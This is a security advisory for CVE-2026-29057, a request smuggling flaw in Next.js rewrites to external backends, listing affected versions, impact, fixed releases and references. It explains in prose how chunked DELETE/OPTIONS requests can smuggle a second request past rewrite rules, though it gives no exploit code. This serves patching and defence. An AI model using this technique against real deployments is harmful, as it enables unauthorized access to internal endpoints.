CVE-2026-29057
Request Smuggling vulnerability in next (npm)
What is CVE-2026-29057 About?
This Next.js vulnerability allows for request smuggling when rewriting proxy traffic to an external backend. A crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` can trigger request boundary disagreement, enabling attackers to smuggle requests. This flaw can bypass security assumptions and is complex to exploit, but has high impact.
Affected Software
- next
- >=16.0.0-beta.0, <16.1.7
- >=9.5.0, <15.5.13
Technical Details
The vulnerability occurs when Next.js rewrites traffic to an external backend. Specifically, if a DELETE or OPTIONS request contains Transfer-Encoding: chunked, an upstream library vendored by Next.js could mishandle content-length headers. The library would incorrectly remove transfer-encoding while not adding content-length: 0 unless both were initially absent. This discrepancy creates a request boundary disagreement between the Next.js proxy and the external backend. An attacker can leverage this, particularly with zero-length chunked encoding, to inject a second, smuggled request that the backend processes as a new, distinct request, bypassing intended rewrite rules.
What is the Impact of CVE-2026-29057?
Successful exploitation may allow attackers to bypass rewrite rules, access internal/admin endpoints, and trigger unintended actions on backend services, potentially leading to unauthorized access and data manipulation.
What is the Exploitability of CVE-2026-29057?
Exploitation requires sending a crafted DELETE or OPTIONS request with Transfer-Encoding: chunked to a Next.js application that uses rewrites to an external backend. The attack is remote and does not require authentication or elevated privileges. The complexity is high, as it relies on precise timing and crafting of HTTP requests to exploit the boundary disagreement, potentially requiring concurrent connections. This vulnerability poses a significant risk for applications that handle their own rewrites rather than delegating to a CDN, allowing attackers to access internal endpoints that should not be directly exposed.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2026-29057?
Available Upgrade Options
- next
- >=9.5.0, <15.5.13 → Upgrade to 15.5.13
- next
- >=16.0.0-beta.0, <16.1.7 → Upgrade to 16.1.7
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8
- https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6
- https://osv.dev/vulnerability/GHSA-ggv3-7p47-pfv8
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v16.1.7
- https://github.com/vercel/next.js/releases/tag/v15.5.13
- https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6
- https://github.com/vercel/next.js/releases/tag/v16.1.7
- https://github.com/vercel/next.js/releases/tag/v15.5.13
- https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8
What are Similar Vulnerabilities to CVE-2026-29057?
Similar Vulnerabilities: CVE-2023-42823 , CVE-2022-31792 , CVE-2020-14199 , CVE-2019-17558 , CVE-2019-14838
